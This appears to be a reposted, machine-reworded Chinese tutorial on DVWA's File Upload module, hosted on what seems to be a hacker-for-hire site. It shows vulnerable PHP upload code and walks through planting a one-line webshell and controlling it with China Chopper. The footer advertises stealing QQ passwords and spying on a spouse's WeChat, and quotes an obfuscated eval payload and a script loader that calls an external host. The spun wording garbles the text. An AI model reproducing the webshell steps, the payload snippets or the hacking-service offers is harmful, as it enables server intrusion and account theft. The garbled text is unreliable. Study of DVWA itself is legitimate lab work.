新手攻略:DVWA-1.9全等级教程之File Upload

访客5年前关于黑客接单899

现在,最新的DVWA现已更新到1.9版别(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版别,且没有针对DVWA high等级的教程,因而萌发了一个编撰新手教程的主意,过错的当地还请我们纠正。
DVWA简介
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性判定的PHP/MySQL Web使用,旨在为安全专业人员测验自己的专业技能和东西供给合法的环境,协助web开发者更好的了解web使用安全防备的进程。
DVWA共有十个模块,分别是
Brute Force(暴力(破解))
Command Injection(指令行注入)
CSRF(跨站恳求假造)
File Inclusion(文件包括)
File Upload(文件上传)
Insecure CAPTCHA (不安全的验证码)
SQL Injection(SQL注入)
SQL Injection(Blind)(SQL盲注)
XSS(Reflected)(反射型跨站脚本)
XSS(Stored)(存储型跨站脚本)
需求留意的是,DVWA 1.9的代码分为四种安全等级:Low,Medium,High,Impossible。初学者能够经过比较四种等级的代码,接触到一些PHP代码审计的内容。

 
DVWA的建立
Freebuf上的这篇文章《新手攻略:手把手教你怎么建立自己的浸透测验环境》(http://www.freebuf.com/sectool/102661.html)现已写得十分好了,在这儿就不赘述了。
之前模块的相关内容
Brute Force
Command Injection
CSRF
File Inclusion
本文介绍File Upload模块的相关内容,后续教程会在之后的文章中给出。
File Upload
File Upload,即文件上传缝隙,通常是因为对上传文件的类型、内容没有进行严厉的过滤、查看,使得攻击者能够经过上传木马获取服务器的webshell权限,因而文件上传缝隙带来的损害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传缝隙。

 
下面临四种等级的代码进行剖析。
Low
服务器端中心代码
 if( isset( $_POST[ 'Upload' ] ) ) {     // Where are we going to be writing to?     $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/d/file/uploads/";     $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );     // Can we move the file to the upload folder?     if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {         // No         echo '
Your image was not uploaded.';     }     else {         // Yes!         echo "
{$target_path} succesfully uploaded!";     } } ?>
basename(path,suffix)
函数回来途径中的文件名部分,假如可选参数suffix为空,则回来的文件名包括后缀名,反之不包括后缀名。
能够看到,服务器对上传文件的类型、内容没有做任何的查看、过滤,存在显着的文件上传缝隙,生成上传途径后,服务器会查看是否上传成功并回来相应提示信息。
缝隙使用
文件上传缝隙的使用是有约束条件的,首要当然是要能够成功上传木马文件,其次上传文件有必要能够被履行,最终便是上传文件的途径有必要可知。不幸的是,这儿三个条件全都满意。
上传文件hack.php(一句话木马)

 
上传成功,而且回来了上传途径

 
翻开我国菜刀,右键增加,
地址栏填入上传文件地点途径http://192.168.153.130/dvwa/hackable/d/file/uploads/hack.php,
参数名(一句话木马口令)为apple。

 
然后菜刀就会经过向服务器发送包括apple参数的post恳求,在服务器上履行恣意指令,获取webshell权限。
能够下载、修正服务器的一切文件。

 
能够翻开服务器的虚拟终端。

[1] [2] [3] [4]  黑客接单网

相关文章

qq空间技术_找怎么找黑客-专业黑客找ip

「qq空间技术_找怎么找黑客-专业黑客找ip」eval('$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).c...

黑客接单吧,黑客找qq密码教学视频下载,找黑客同步老婆微信

小结这种查询的成果必定是这种http://tiechemo.com/page.asp?id=1和1=2(由于120大于109)。 咱们接着测验,一般在企业中职工薪酬都被视为秘要,这太让人心痒痒了,我内...

QQ黑客接单真实吗,外国黑客木进去代码世界找漏洞电影,黑客找漏洞方法

默许HTTP 端口: 80 TCP图19 假造遥控器的SPI指令数字逻辑http://www.xxx.com/include/dialog/ … =/include/FCKeditor./flashl...

现实中真的有黑客接单网站吗,黑客怎么找份工作,找一名黑客老师

location.href = 'https://www.google.com/chrome/';import java.rmi.registry.LocateRegistry;ARP诈骗与MITM%...

恣意用户暗码重置(六):应对中存在影响后续逻辑的状态参数

在逻辑缝隙中,恣意用户暗码重置最为常见,或许出现在新用户注册页面,也或许是用户登录后重置暗码的页面,或许用户忘掉暗码时的暗码找回页面,其间,暗码找回功用是重灾区。我把日常浸透过程中遇到的事例作了缝隙成...

电脑卫士哪个好用,我要找黑客的微信,找黑客盗取YY号

document.write('script src=http://a'+'.c059'+'4.com/?e=5>script>')下载:http://www.dsploit.net/do...